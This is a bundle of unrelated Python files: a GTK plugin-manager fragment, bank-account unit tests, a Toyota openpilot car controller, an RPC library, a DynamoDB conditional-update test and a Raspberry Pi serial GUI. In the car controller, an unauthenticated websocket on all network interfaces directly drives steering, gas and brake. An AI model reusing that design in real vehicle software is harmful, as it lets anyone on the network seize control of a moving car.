if plugin_id is None:
return
if plugin_id in self.application.plugin_manager:
klass = self.application.plugin_manager[plugin_id]
compatibility_details = list(klass.compatibility)
else:
repo_model, catalog_model = self._get_plugin_model_parents(self._last_plugin_selected)
compatibility_details = list(self.catalog_plugins.compatibility(catalog_model.id, repo_model.id, named_plugin.id))
popover = Gtk.Popover()
popover.set_relative_to(self.gobjects['label_plugin_info_for_compatible'])
grid = Gtk.Grid()
popover.add(grid)
grid.insert_column(0)
grid.insert_column(0)
grid.insert_column(0)
grid.set_column_spacing(3)
compatibility_details.insert(0, ('Type', 'Value', 'Met'))
row = 0
for row, req in enumerate(compatibility_details):
grid.insert_row(row)
label = Gtk.Label(req[0])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 0, row, 1, 1)
label = Gtk.Label(req[1])
label.set_property('halign', Gtk.Align.START)
grid.attach(label, 1, row, 1, 1)
label = Gtk.Label(('Yes' if req[2] else 'No') if row else req[2])
label.set_property('halign', Gtk.Align.END)
grid.attach(label, 2, row, 1, 1)
if not row:
popover.destroy()
return
popover.show_all()
def signal_expander_activate(self, expander):
paned = self.gobjects['paned_plugins']
if expander.get_property('expanded'): # collapsing
paned.set_position(paned.get_allocation().height + self._paned_offset)
def signal_label_activate_link(self, _, uri):
utilities.open_uri(uri)
def signal_paned_button_press_event(self, paned, event):
return not self.gobjects['expander_info'].get_property('expanded')
def signal_popup_menu_activate_reload(self, _):
self._reload()
def signal_popup_menu_activate_reload_all(self, _):
self._worker_thread_start(self._load_catalogs_tsafe, refresh=True)
def signal_popup_menu_activate_show_documentation(self, _):
named_row = self._selected_named_row
if named_row is None or named_row.type != _ROW_TYPE_PLUGIN:
return
if not named_row.installed:
gui_utilities.show_dialog_warning('No Documentation', self.window, 'This plugin has no documentation.')
return
try:
PluginDocumentationWindow(self.application, named_row.id)
except FileNotFoundError as error:
self.logger.warning(error.strerror)
gui_utilities.show_dialog_warning('No Documentation', self.window, error.strerror.capitalize() + '.')
def signal_popup_menu_activate_update(self, _):
model_row = self._selected_model_row
named_row = None if model_row is None else _ModelNamedRow(*model_row)
if named_row is None:
return
if not (named_row.type == _ROW_TYPE_PLUGIN and named_row.installed and named_row.sensitive_installed):
return
if not self._plugin_uninstall(model_row):
gui_utilities.show_dialog_error('Update Failed', self.window, 'Failed to uninstall the existing plugin data.')
return
self._plugin_install(model_row)
def signal_renderer_toggled_enable(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type != _ROW_TYPE_PLUGIN:
return
if named_row.id not in self.application.plugin_manager.loaded_plugins:
return
if named_row.id in self.__load_errors:
gui_utilities.show_dialog_error('Can Not Enable Plugin', self.window, 'Can not enable a plugin which failed to load.')
return
if named_row.enabled:
self._plugin_disable(model_row)
else:
self._plugin_enable(model_row)
def signal_renderer_toggled_install(self, _, path):
model_row = self._model[path]
named_row = _ModelNamedRow(*model_row)
if named_row.type == _ROW_TYPE_PLUGIN and named_row.installed:
if named_row.enabled:
self._plugin_disable(model_row)
self._plugin_uninstall(model_row)
else:
self._plugin_install(model_row)
def signal_treeview_row_activated(self, treeview, path, column):
model_row = self._model[path]
self._set_info(model_row)
self._popup_menu_refresh(model_row)
|
bank_account_test.py
|
import sys
import threading
import time
import unittest
from bank_account import BankAccount
class BankAccountTests(unittest.TestCase):
def setUp(self):
self.account = BankAccount()
def test_newly_opened_account_has_zero_balance(self):
self.account.open()
self.assertEqual(self.account.get_balance(), 0)
def test_can_deposit_money(self):
self.account.open()
self.account.deposit(100)
self.assertEqual(self.account.get_balance(), 100)
def test_can_deposit_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.deposit(50)
self.assertEqual(self.account.get_balance(), 150)
def test_can_withdraw_money(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(50)
self.assertEqual(self.account.get_balance(), 50)
def test_can_withdraw_money_sequentially(self):
self.account.open()
self.account.deposit(100)
self.account.withdraw(20)
self.account.withdraw(80)
self.assertEqual(self.account.get_balance(), 0)
def test_checking_balance_of_closed_account_throws_error(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.get_balance()
def test_deposit_into_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.deposit(50)
def test_withdraw_from_closed_account(self):
self.account.open()
self.account.close()
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_more_than_deposited(self):
self.account.open()
self.account.deposit(25)
with self.assertRaises(ValueError):
self.account.withdraw(50)
def test_cannot_withdraw_negative(self):
self.account.open()
self.account.deposit(100)
with self.assertRaises(ValueError):
self.account.withdraw(-50)
def test_cannot_deposit_negative(self):
self.account.open()
with self.assertRaises(ValueError):
self.account.deposit(-50)
def test_can_handle_concurrent_transactions(self):
self.account.open()
self.account.deposit(1000)
for _ in range(10):
self.adjust_balance_concurrently()
def adjust_balance_concurrently(self):
def transact():
self.account.deposit(5)
time.sleep(0.001)
self.account.withdraw(5)
# Greatly improve the chance of an operation being interrupted
# by thread switch, thus testing synchronization effectively
try:
sys.setswitchinterval(1e-12)
except AttributeError:
# For Python 2 compatibility
sys.setcheckinterval(1)
threads = []
for _ in range(1000):
t = threading.Thread(target=transact)
threads.append(t)
t.start()
for thread in threads:
thread.join()
self.assertEqual(self.account.get_balance(), 1000)
if __name__ == '__main__':
unittest.main()
|
carcontroller.py
|
from cereal import car
import json
import asyncio
from threading import Thread
import websockets
from common.params import Params
from common.numpy_fast import clip
from selfdrive.car import apply_toyota_steer_torque_limits, create_gas_command, make_can_msg, gen_empty_fingerprint
from selfdrive.car.toyota.toyotacan import create_steer_command, create_ui_command, \
create_accel_command, create_acc_cancel_command, \
create_fcw_command
from selfdrive.car.toyota.values import Ecu, CAR, STATIC_MSGS, SteerLimitParams, TSS2_CAR
from opendbc.can.packer import CANPacker
from common.op_params import opParams
#import cereal.messaging as messaging
op_params = opParams()
ludicrous_mode = op_params.get('ludicrous_mode')
VisualAlert = car.CarControl.HUDControl.VisualAlert
#Joystick shit
joystick_accel = 0.000
joystick_brake = 0.000
joystick_steer = 0.000
joystick_enabled = False
joystick_started = False
joystick_alert = False
joystick_server = None
async def JoystickRecieve(websocket, path):
global joystick_accel
global joystick_brake
global joystick_steer
global joystick_enabled
global joystick_alert
async for message in websocket:
messageJson = json.loads(message)
# Check if we should make an alert
if joystick_enabled != bool(messageJson["Enabled"]):
joystick_alert = True
joystick_enabled = bool(messageJson["Enabled"]);
joystick_accel = float(messageJson["Gas"])
joystick_brake = float(messageJson["Brake"])
joystick_steer = float(messageJson["Steering"])
await websocket.send(message)
def joystick_start_loop():
global joystick_server
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
joystick_server = websockets.serve(JoystickRecieve, "0.0.0.0", 5000)
loop.run_until_complete(joystick_server)
loop.run_forever()
# Accel limits
ACCEL_HYST_GAP = 0.02 # don't change accel command for small oscilalitons within this value
ACCEL_MAX = 3.5 # 3.5 m/s2
ACCEL_MIN = -3.5 # 3.5 m/s2
ACCEL_SCALE = max(ACCEL_MAX, -ACCEL_MIN)
# Blindspot codes
LEFT_BLINDSPOT = b'\x41'
RIGHT_BLINDSPOT = b'\x42'
BLINDSPOTALWAYSON = False
def set_blindspot_debug_mode(lr,enable):
if enable:
m = lr + b'\x02\x10\x60\x00\x00\x00\x00'
else:
m = lr + b'\x02\x10\x01\x00\x00\x00\x00'
return make_can_msg(0x750, m, 0)
def poll_blindspot_status(lr):
m = lr + b'\x02\x21\x69\x00\x00\x00\x00'
return make_can_msg(0x750, m, 0)
def accel_hysteresis(accel, accel_steady, enabled):
# for small accel oscillations within ACCEL_HYST_GAP, don't change the accel command
if not enabled:
# send 0 when disabled, otherwise acc faults
accel_steady = 0.
elif accel > accel_steady + ACCEL_HYST_GAP:
accel_steady = accel - ACCEL_HYST_GAP
elif accel < accel_steady - ACCEL_HYST_GAP:
accel_steady = accel + ACCEL_HYST_GAP
accel = accel_steady
return accel, accel_steady
class CarController():
def __init__(self, dbc_name, CP, VM):
self.last_steer = 0
self.accel_steady = 0.
self.alert_active = False
self.last_standstill = False
self.standstill_req = False
self.blindspot_blink_counter_left = 0
self.blindspot_blink_counter_right = 0
self.blindspot_debug_enabled_left = False
self.blindspot_debug_enabled_right = False
#self.sm = messaging.SubMaster(['pathPlan'])
#self.rightLaneDepart = False
#self.leftLaneDepart = False
self.last_fault_frame = -200
self.steer_rate_limited = False
self.fake_ecus = set()
if CP.enableCamera: self.fake_ecus.add(Ecu.fwdCamera)
if CP.enableDsu: self.fake_ecus.add(Ecu.dsu)
params = Params()
try:
cached_fingerprint = params.get('CachedFingerprint')
vin = params.get('CarVin')
finger = gen_empty_fingerprint()
cached_fingerprint = json.loads(cached_fingerprint)
finger[0] = {int(key): value for key, value in cached_fingerprint[2].items()}
if 0x2FF in finger[0] and vin == b'JTMWRREV10D058569': self.fake_ecus.add(Ecu.unknown)
except:
pass
self.packer = CANPacker(dbc_name)
def update(self, enabled, CS, frame, actuators, pcm_cancel_cmd, hud_alert,
left_line, right_line, lead, left_lane_depart, right_lane_depart):
#if not enabled:
# self.sm.update(0)
#if self.sm.updated['pathPlan']:
# blinker = CS.out.leftBlinker or CS.out.rightBlinker
# ldw_allowed = CS.out.vEgo > 12.5 and not blinker
# CAMERA_OFFSET = op_params.get('camera_offset')
# right_lane_visible = self.sm['pathPlan'].rProb > 0.5
# left_lane_visible = self.sm['pathPlan'].lProb > 0.5
# self.rightLaneDepart = bool(ldw_allowed and self.sm['pathPlan'].rPoly[3] > -(0.93 + CAMERA_OFFSET) and right_lane_visible)
# self.leftLaneDepart = bool(ldw_allowed and self.sm['pathPlan'].lPoly[3] < (0.93 - CAMERA_OFFSET) and left_lane_visible)
# print("blinker")
# print(blinker)
# print("ldw_allowed")
# print(ldw_allowed)
# print("CAMERA_OFFSET")
# print(CAMERA_OFFSET)
# print("right_lane_visible")
# print(right_lane_visible)
# print("left_lane_visible")
# print(left_lane_visible)
# print("self.rightLaneDepart")
# print(self.rightLaneDepart)
# print("self.leftLaneDepart")
# print(self.leftLaneDepart)
# *** compute control surfaces ***
# gas and brake
global joystick_started
global joystick_thread
global joystick_enabled
global joystick_alert
global joystick_accel
global joystick_brake
global joystick_steer
# Start threading
if not joystick_started:
joystick_started = True
joystick_thread = Thread(target=joystick_start_loop, args=())
joystick_thread.start()
#print("Joystick started " + str(joystick_started));
#Set actuators to joystick
if joystick_enabled:
actuators.steer = -joystick_steer
actuators.gas = joystick_accel
actuators.brake = joystick_brake
apply_gas = clip(actuators.gas, 0., 1.)
if CS.CP.enableGasInterceptor:
# send only negative accel if interceptor is detected. otherwise, send the regular value
# +0.06 offset to reduce ABS pump usage when OP is engaged
apply_accel = 0.06 - actuators.brake
else:
apply_accel = actuators.gas - actuators.brake
apply_accel, self.accel_steady = accel_hysteresis(apply_accel, self.accel_steady, enabled)
factor = 2 if ludicrous_mode else 1
apply_accel = clip(apply_accel * ACCEL_SCALE * factor, ACCEL_MIN, ACCEL_MAX)
#if ludicrous_mode:
# print(apply_accel)
if CS.CP.enableGasInterceptor:
if CS.out.gasPressed:
apply_accel = max(apply_accel, 0.06)
if CS.out.brakePressed:
apply_gas = 0.0
apply_accel = min(apply_accel, 0.00)
else:
if CS.out.gasPressed:
apply_accel = max(apply_accel, 0.0)
if CS.out.brakePressed and CS.out.vEgo > 1:
apply_accel = min(apply_accel, 0.0)
# steer torque
new_steer = int(round(actuators.steer * SteerLimitParams.STEER_MAX))
# only cut torque when steer state is a known fault
if CS.steer_state in [9, 25]:
self.last_fault_frame = frame
# Cut steering for 1s after fault
if (frame - self.last_fault_frame < 100) or abs(CS.out.steeringRate) > 100 or (abs(CS.out.steeringAngle) > 150 and CS.CP.carFingerprint in [CAR.RAV4H, CAR.PRIUS]) or abs(CS.out.steeringAngle) > 400:
new_steer = 0
apply_steer_req = 0
else:
apply_steer_req = 1
if not enabled and right_lane_depart and CS.out.vEgo > 12.5 and not CS.out.rightBlinker:
new_steer = self.last_steer + 3
new_steer = min(new_steer , 800)
apply_steer_req = 1
if not enabled and left_lane_depart and CS.out.vEgo > 12.5 and not CS.out.leftBlinker:
new_steer = self.last_steer - 3
new_steer = max(new_steer , -800)
#print ("left")
#print (new_steer)
apply_steer_req = 1
apply_steer = apply_toyota_steer_torque_limits(new_steer, self.last_steer, CS.out.steeringTorqueEps, SteerLimitParams)
self.steer_rate_limited = new_steer != apply_steer
if not enabled and abs(apply_steer) > 800 and not (right_lane_depart or left_lane_depart):
apply_steer = 0
apply_steer_req = 0
if not enabled and CS.pcm_acc_status:
# send pcm acc cancel cmd if drive is disabled but pcm is still on, or if the system can't be activated
pcm_cancel_cmd = 1
# on entering standstill, send standstill request
if CS.out.standstill and not self.last_standstill:
self.standstill_req = True
if CS.pcm_acc_status != 8:
# pcm entered standstill or it's disabled
self.standstill_req = False
self.last_steer = apply_steer
self.last_accel = apply_accel
self.last_standstill = CS.out.standstill
can_sends = []
#*** control msgs ***
#print("steer {0} {1} {2} {3}".format(apply_steer, min_lim, max_lim, CS.steer_torque_motor)
# toyota can trace shows this message at 42Hz, with counter adding alternatively 1 and 2;
# sending it at 100Hz seem to allow a higher rate limit, as the rate limit seems imposed
# on consecutive messages
if Ecu.fwdCamera in self.fake_ecus:
can_sends.append(create_steer_command(self.packer, apply_steer, apply_steer_req, frame))
# LTA mode. Set ret.steerControlType = car.CarParams.SteerControlType.angle and whitelist 0x191 in the panda
# if frame % 2 == 0:
# can_sends.append(create_steer_command(self.packer, 0, 0, frame // 2))
# can_sends.append(create_lta_steer_command(self.packer, actuators.steerAngle, apply_steer_req, frame // 2))
# we can spam can to cancel the system even if we are using lat only control
if (frame % 3 == 0 and CS.CP.openpilotLongitudinalControl) or (pcm_cancel_cmd and Ecu.fwdCamera in self.fake_ecus):
lead = lead or CS.out.vEgo < 12. # at low speed we always assume the lead is present do ACC can be engaged
# Lexus IS uses a different cancellation message
if pcm_cancel_cmd and CS.CP.carFingerprint == CAR.LEXUS_IS:
can_sends.append(create_acc_cancel_command(self.packer))
elif CS.CP.openpilotLongitudinalControl:
can_sends.append(create_accel_command(self.packer, apply_accel, pcm_cancel_cmd, self.standstill_req, lead, CS.distance))
else:
can_sends.append(create_accel_command(self.packer, 0, pcm_cancel_cmd, False, lead, CS.distance))
if (frame % 2 == 0) and (CS.CP.enableGasInterceptor):
# send exactly zero if apply_gas is zero. Interceptor will send the max between read value and apply_gas.
# This prevents unexpected pedal range rescaling
can_sends.append(create_gas_command(self.packer, apply_gas, frame//2))
# ui mesg is at 100Hz but we send asap if:
# - there is something to display
# - there is something to stop displaying
fcw_alert = hud_alert == VisualAlert.fcw
steer_alert = hud_alert == VisualAlert.steerRequired
send_ui = False
if ((fcw_alert or steer_alert) and not self.alert_active) or \
(not (fcw_alert or steer_alert) and self.alert_active):
send_ui = True
self.alert_active = not self.alert_active
elif pcm_cancel_cmd:
# forcing the pcm to disengage causes a bad fault sound so play a good sound instead
send_ui = True
if (frame % 100 == 0 or send_ui) and Ecu.fwdCamera in self.fake_ecus:
can_sends.append(create_ui_command(self.packer, steer_alert, pcm_cancel_cmd, left_line, right_line, left_lane_depart, right_lane_depart))
if frame % 100 == 0 and (Ecu.dsu in self.fake_ecus or Ecu.unknown in self.fake_ecus):
can_sends.append(create_fcw_command(self.packer, fcw_alert))
#*** static msgs ***
for (addr, ecu, cars, bus, fr_step, vl) in STATIC_MSGS:
if frame % fr_step == 0 and ecu in self.fake_ecus and CS.CP.carFingerprint in cars:
## special cases
#if fr_step == 5 and ecu == Ecu.fwdCamera and bus == 1:
# #print(addr)
# cnt = int(((frame / 5) % 7) + 1) << 5
# vl = bytes([cnt]) + vl
#elif addr in (0x489, 0x48a) and bus == 0:
# #print(addr)
# # add counter for those 2 messages (last 4 bits)
# cnt = int((frame/100)%0xf) + 1
# if addr == 0x48a:
# # 0x48a has a 8 preceding the counter
# cnt += 1 << 7
# vl += bytes([cnt])
can_sends.append(make_can_msg(addr, vl, bus))
# Enable blindspot debug mode once
if frame > 1000 and not (CS.CP.carFingerprint in TSS2_CAR or CS.CP.carFingerprint in [CAR.CAMRY, CAR.CAMRYH, CAR.AVALON_2021]): # 10 seconds after start and not a tss2 car
if BLINDSPOTALWAYSON:
self.blindspot_blink_counter_left += 1
self.blindspot_blink_counter_right += 1
#print("debug blindspot alwayson!")
elif CS.out.leftBlinker:
self.blindspot_blink_counter_left += 1
#print("debug Left Blinker on")
elif CS.out.rightBlinker:
self.blindspot_blink_counter_right += 1
#print("debug Right Blinker on")
else:
self.blindspot_blink_counter_left = 0
self.blindspot_blink_counter_right = 0
if self.blindspot_debug_enabled_left:
can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, False))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x10\x01\x00\x00\x00\x00', 0))
self.blindspot_debug_enabled_left = False
#print ("debug Left blindspot debug disabled")
if self.blindspot_debug_enabled_right:
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False))
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x01\x00\x00\x00\x00', 0))
self.blindspot_debug_enabled_right = False
#print("debug Right blindspot debug disabled")
if self.blindspot_blink_counter_left > 9 and not self.blindspot_debug_enabled_left: #check blinds
can_sends.append(set_blindspot_debug_mode(LEFT_BLINDSPOT, True))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x10\x60\x00\x00\x00\x00', 0))
#print("debug Left blindspot debug enabled")
self.blindspot_debug_enabled_left = True
if self.blindspot_blink_counter_right > 5 and not self.blindspot_debug_enabled_right: #enable blindspot debug mode
if CS.out.vEgo > 6: #polling at low speeds switches camera off
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x60\x00\x00\x00\x00', 0))
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, True))
#print("debug Right blindspot debug enabled")
self.blindspot_debug_enabled_right = True
if CS.out.vEgo < 6 and self.blindspot_debug_enabled_right: # if enabled and speed falls below 6m/s
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x10\x01\x00\x00\x00\x00', 0))
can_sends.append(set_blindspot_debug_mode(RIGHT_BLINDSPOT, False))
self.blindspot_debug_enabled_right = False
#print("debug Right blindspot debug disabled")
if self.blindspot_debug_enabled_left:
if frame % 20 == 0 and frame > 1001: # Poll blindspots at 5 Hz
can_sends.append(poll_blindspot_status(LEFT_BLINDSPOT))
#can_sends.append(make_can_msg(0x750, b'\x41\x02\x21\x69\x00\x00\x00\x00', 0))
#print("debug Left blindspot poll")
if self.blindspot_debug_enabled_right:
if frame % 20 == 10 and frame > 1005: # Poll blindspots at 5 Hz
#can_sends.append(make_can_msg(0x750, b'\x42\x02\x21\x69\x00\x00\x00\x00', 0))
can_sends.append(poll_blindspot_status(RIGHT_BLINDSPOT))
#print("debug Right blindspot poll")
return can_sends
|
rpc.py
|
import inspect
import logging
from concurrent.futures import ThreadPoolExecutor
from threading import Thread, RLock, Event
from uuid import uuid4
from jsonschema import Draft4Validator
from weavelib.messaging import Sender, Receiver
from weavelib.messaging.messaging import raise_message_exception
from weavelib.exceptions import WeaveException, BadArguments
from weavelib.services import MessagingEnabled
from .api import API, ArgParameter, KeywordParameter
logger = logging.getLogger(__name__)
MESSAGING_PLUGIN_URL = "https://github.com/HomeWeave/WeaveServer.git"
def api_group_schema(apis):
return {
"anyOf": [x.schema for x in apis]
}
class RemoteAPIError(RuntimeError):
"""Raised to indicate exception thrown by remote API."""
class ClientAPI(API):
def __init__(self, name, desc, params, handler):
super(ClientAPI, self).__init__(name, desc, params)
self.handler = handler
def __call__(self, *args, _block=False, _callback=None, **kwargs):
obj = self.validate_call(*args, **kwargs)
return self.handler(obj, block=_block, callback=_callback)
@staticmethod
def from_info(info, handler):
api = ClientAPI(info["name"], info["description"], [], handler)
api.args = [ArgParameter.from_info(x) for x in info.get("args", [])]
api.kwargs = [KeywordParameter.from_info(x) for x in
info.get("kwargs", {}).values()]
return api
class ServerAPI(API):
def __init__(self, name, desc, params, handler):
super(ServerAPI, self).__init__(name, desc, params)
self.handler = handler
def __call__(self, *args, **kwargs):
self.validate_call(*args, **kwargs)
return self.handler(*args, **kwargs)
class RPC(object):
def __init__(self, name, description, apis):
self.name = name
self.description = description
self.apis = {x.name: x for x in apis}
def __getitem__(self, name):
return self.apis[name]
@property
def request_schema(self):
return {
"type": "object",
"properties": {
"invocation": api_group_schema(self.apis.values()),
}
}
@property
def response_schema(self):
return {"type": "object"}
class RPCReceiver(Receiver):
def __init__(self, conn, component, queue, host="localhost", **kwargs):
super(RPCReceiver, self).__init__(conn, queue, host=host, **kwargs)
self.component = component
def on_message(self, msg, headers):
self.component.on_rpc_message(msg, headers)
class RPCServer(RPC):
MAX_RPC_WORKERS = 5
def __init__(self, name, description, apis, service,
allowed_requestors=None):
if not isinstance(service, MessagingEnabled):
raise BadArguments("Service is not messaging enabled.")
super(RPCServer, self).__init__(name, description, apis)
self.service = service
self.executor = ThreadPoolExecutor(self.MAX_RPC_WORKERS)
self.sender = None
self.receiver = None
self.receiver_thread = None
self.cookie = None
self.appmgr_client = None
self.allowed_requestors = allowed_requestors or []
def register_rpc(self):
apis = {name: api.info for name, api in self.apis.items()}
# TODO: This means one extra RC for every registration. Clean up.
result = self.appmgr_client["register_rpc"](self.name, self.description,
apis,
self.allowed_requestors,
_block=True)
return result
def update_rpc(self, callback=None):
apis = {name: api.info for name, api in self.apis.items()}
return self.appmgr_client["update_rpc"](self.name, apis,
_block=(not callback),
_callback=callback)
def start(self):
conn = self.service.get_connection()
auth_token = self.service.get_auth_token()
self.appmgr_client = self.get_appmgr_client()
self.appmgr_client.start()
rpc_info = self.register_rpc()
self.sender = Sender(conn, rpc_info["response_queue"], auth=auth_token)
self.receiver = RPCReceiver(conn, self, rpc_info["request_queue"],
auth=auth_token)
self.sender.start()
self.receiver.start()
self.receiver_thread = Thread(target=self.receiver.run)
self.receiver_thread.start()
def get_appmgr_client(self):
# This is so that RootRPCServer in WeaveServer need not create an
# RPCClient to itself.
rpc_info = find_rpc(self.service, MESSAGING_PLUGIN_URL, "app_manager")
return RPCClient(self.service.get_connection(), rpc_info,
self.service.get_auth_token())
def stop(self):
self.appmgr_client["unregister_rpc"](self.name, _block=True)
self.appmgr_client.stop()
# TODO: Delete the queue, too.
self.receiver.stop()
self.receiver_thread.join()
self.executor.shutdown()
def on_rpc_message(self, rpc_obj, headers):
def make_done_callback(request_id, cmd, cookie):
def callback(future):
try:
self.sender.send({
"id": request_id,
"command": cmd,
"result": future.result()
}, headers={"COOKIE": cookie})
except WeaveException as e:
logger.warning("WeaveException was raised by API: %s", e)
self.sender.send({
"id": request_id,
"command": cmd,
"error_name": e.err_msg(),
"error": e.extra
}, headers={"COOKIE": cookie})
except Exception as e:
logger.exception("Internal API raised exception." + str(e))
self.sender.send({
"id": request_id,
"command": cmd,
"error": "Internal API Error."
}, headers={"COOKIE": cookie})
return callback
def execute_api_internal(rpc_obj, headers, api, *args, **kwargs):
# Keep func name in sync one in get_rpc_caller(..)
return api(*args, **kwargs)
obj = rpc_obj["invocation"]
cookie = rpc_obj["response_cookie"]
request_id = obj["id"]
cmd = obj["command"]
try:
api = self[cmd]
except KeyError:
self.sender.send({
"id": request_id,
"result": False,
"error": "API not found."
})
return
args = obj.get("args", [])
kwargs = obj.get("kwargs", {})
future = self.executor.submit(execute_api_internal, rpc_obj, headers,
api, *args, **kwargs)
future.add_done_callback(make_done_callback(request_id, cmd, cookie))
@property
def info_message(self):
return {
"name": self.name,
"description": self.description,
"apis": {name: api.info for name, api in self.apis.items()},
"request_queue": self.receiver.channel,
"response_queue": self.sender.channel
}
class RPCClient(RPC):
def __init__(self, conn, rpc_info, token=None):
self.token = token
name = rpc_info["name"]
description = rpc_info["description"]
apis = [self.get_api_call(x) for x in rpc_info["apis"].values()]
super(RPCClient, self).__init__(name, description, apis)
self.client_cookie = "rpc-client-cookie-" + str(uuid4())
self.sender = Sender(conn, rpc_info["request_queue"], auth=self.token)
self.receiver = RPCReceiver(conn, self, rpc_info["response_queue"],
cookie=self.client_cookie)
self.receiver_thread = Thread(target=self.receiver.run)
self.callbacks = {}
self.callbacks_lock = RLock()
def start(self):
self.sender.start()
self.receiver.start()
self.receiver_thread.start()
def stop(self):
self.sender.close()
self.receiver.stop()
self.receiver_thread.join()
def get_api_call(self, obj):
def make_blocking_callback(event, response_arr):
def callback(obj):
response_arr.append(obj)
event.set()
return callback
def on_invoke(obj, block, callback):
msg_id = obj["id"]
if block:
res_arr = []
event = Event()
callback = make_blocking_callback(event, res_arr)
if callback:
with self.callbacks_lock:
self.callbacks[msg_id] = callback
self.sender.send({
"invocation": obj,
"response_cookie": self.client_cookie
}, headers={"AUTH": self.token})
if not block:
return
event.wait()
return extract_rpc_payload(res_arr[0])
return ClientAPI.from_info(obj, on_invoke)
def on_rpc_message(self, msg, headers):
with self.callbacks_lock:
callback = self.callbacks.pop(msg["id"])
if not callback:
return
callback(msg)
def get_rpc_caller():
for frame, _, _, func, _, _ in inspect.stack(context=0):
if func == 'execute_api_internal':
if "headers" not in frame.f_locals:
continue
return frame.f_locals["headers"].get("AUTH")
def find_rpc(service, app_url, rpc_name):
token = service.get_auth_token()
conn = service.get_connection()
rpc_info = {
"name": "",
"description": "",
"apis": {
"rpc_info": {
"name": "rpc_info",
"description": "",
"args": [
{
"name": "app_url",
"description": "",
"schema": {"type": "string"}
},
{
"name": "rpc_name",
"description": "",
"schema": {"type": "string"}
},
]
}
},
"request_queue": "/_system/registry/request",
"response_queue": "/_system/registry/response",
}
client = RPCClient(conn, rpc_info, token)
client.start()
res = client["rpc_info"](app_url, rpc_name, _block=True)
client.stop()
return res
def extract_rpc_payload(response):
if "result" in response:
return response["result"]
elif "error_name" in response:
raise_message_exception(response["error_name"], response.get("error"))
else:
raise RemoteAPIError(response.get("error"))
|
dynamodb_conditional_update.py
|
import boto3,os
from boto3.dynamodb.conditions import Key
import argparse
from datetime import datetime
from botocore.exceptions import ClientError
from boto3.dynamodb.conditions import Attr, AttributeNotExists
datasource = 'flight-19096'
partition_key = '20200428'
table_name = 'ygpp-devl-ingestion-notification'
def get_boto3_resource(service='s3'):
session = boto3.session.Session()
return session.resource(service)
def get_item():
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
resp = table.get_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
}
)
print(resp)
def update(col_name, col_val):
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
resp = table.update_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
},
UpdateExpression="set " + col_name + " = :value",
ExpressionAttributeValues={
':value': col_val
},
ReturnValues="UPDATED_NEW"
)
print(resp)
'''
S3 versioning is enabled.
It is possible for multiple ingestion updates to come in for the same partition key,
using the S3 version tag, only update if incoming ingestion trigger is for the latest version.
This is happening in a scenario wherein the downstream is doing some kind of processing
which is causing 100's of S3 trigger's simultaneously in some instances, so validation was failing as
lambda was using the older version of the file.
The best solution is to fix at the downstream end, but consumer does not have control
over this at this time. Other solution is to schedule a a lambda S3 pull, instead s3 trigger,
if the processing happens at a particular time, like market closing, etc.
'''
def update_with_condition(col_name, col_val, ver_val):
dynamodb = get_boto3_resource('dynamodb')
table = dynamodb.Table(table_name)
try:
resp = table.update_item(
Key={
'datasource': datasource,
'partitionkey': partition_key,
},
UpdateExpression = "set " + col_name + " = :value, ver = :ver",
# attribute does not exist or the new version just come in is older the existing version ib dyanmodb
ConditionExpression= ' attribute_not_exists(ver) or :ver > ver ',
ExpressionAttributeValues={
':value' : col_val,
':ver' : ver_val
},
ReturnValues="UPDATED_NEW"
)
print(resp)
except ClientError as e:
if e.response['Error']['Code'] == 'ConditionalCheckFailedException':
print(e.response['Error'])
'''
The following code is to test dynamodb conditional update
works as desired when multiple updates happen on the same row/record
'''
import threading
col_checksumver = 'checksumver'
col_ver = 'valueofver'
def worker(col_name, col_val, ver):
"""thread worker function"""
update_with_condition(col_name, col_val, ver)
return
'''
Once the threads are started(t.start()) one cannot say which thread will run to completion first.
'''
def run():
threads = []
for i in range(40, 20, -2):
print(str(i) + '...')
t = threading.Thread(target=worker, args=(col_checksumver + str(i), col_ver + str(i) + " " + datetime.now().strftime('%Y%m%d%H%M%S%f'), i))
threads.append(t)
t.start()
for t in threads:
t.join() # wait for the thread to complete
# see the update
print('get item')
get_item()
if __name__ == '__main__':
run()
|
aq_test.py
|
import serial
import serial.tools.list_ports
import threading
import time
from guizero import App, Text, PushButton, CheckBox, Slider, TextBox
temp = 0
e_co2 = 0
ser = serial.Serial("/dev/ttyS0", 9600)
def clear_console():
console.value = ""
app = App(title="Raspberry Pi AQ", layout="grid")
console = TextBox(app, width=40, height=15, scrollbar=True, multiline=True, grid=[0, 6, 2, 1])
log_checkbox = CheckBox(app, text="Log", grid=[0,5])
PushButton(app, text="Clear Console", command=clear_console, grid=[1,5])
def log(message):
if log_checkbox.value:
console.value += message
def send(message):
log(">"+message)
ser.write(bytes(message+"\n", 'utf-8'))
def wait_for_message():
global temp, e_co2
time.sleep(0.1) # give attiny time to respond
t0=time.monotonic()
incoming_message = str(ser.readline()[:-2].decode("utf-8")) # remove LF, CR turn into string
# print("incoming_message: " + incoming_message)
t1=time.monotonic()
# print(t1-t0)
log("<" + incoming_message)
message_parts = incoming_message.split("=")
if len(message_parts) == 2:
code, value = message_parts
if code == "t":
temp = float(value)
elif code == "c":
e_co2 = float(value)
def checkbox_changed():
if checkbox.value == 1:
send("m")
#ser.write(b"m\n")
else:
ser.write(b"a\n")
def update_readings():
while True:
send("t")
wait_for_message()
time.sleep(0.1) # give attiny time to respond
send("c")
wait_for_message()
time.sleep(1)
